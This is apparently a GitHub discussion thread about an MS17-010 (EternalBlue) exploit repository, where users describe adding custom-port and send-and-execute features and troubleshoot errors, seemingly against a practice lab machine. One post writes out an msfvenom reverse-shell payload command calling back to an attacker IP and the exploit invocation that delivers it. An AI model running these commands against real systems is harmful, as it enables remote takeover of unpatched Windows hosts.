MS17-010
MS17-010 copied to clipboard
Adding suport to custom tcp port
I added support to custom TCP port, it is very usefull in case of port fowarding and pivoting.
My Best Regards.
I added a new file, based on zzz_exploit.py to send and execute an windows executable file
using zzz_exploit.py, victim >> pwned.txt created successfully
but using send_and_execute execution.py
Starting service mTfl..... SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion. Removing service mTfl..... Done
I added a new file, based on zzz_exploit.py to send and execute an windows executable file
using zzz_exploit.py, victim >> pwned.txt created successfully but using send_and_execute execution.py
Starting service mTfl..... SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion. Removing service mTfl..... Done
Same error, has anyone solved it?
Hey,
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.30 LPORT=8888 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.16.30_8888.exe
python send_and_execute.py 10.129.235.221 rev_10.10.16.30_8888.exe
Trying to connect to 10.129.235.221:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
Traceback (most recent call last):
File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 1077, in
How can I fix this?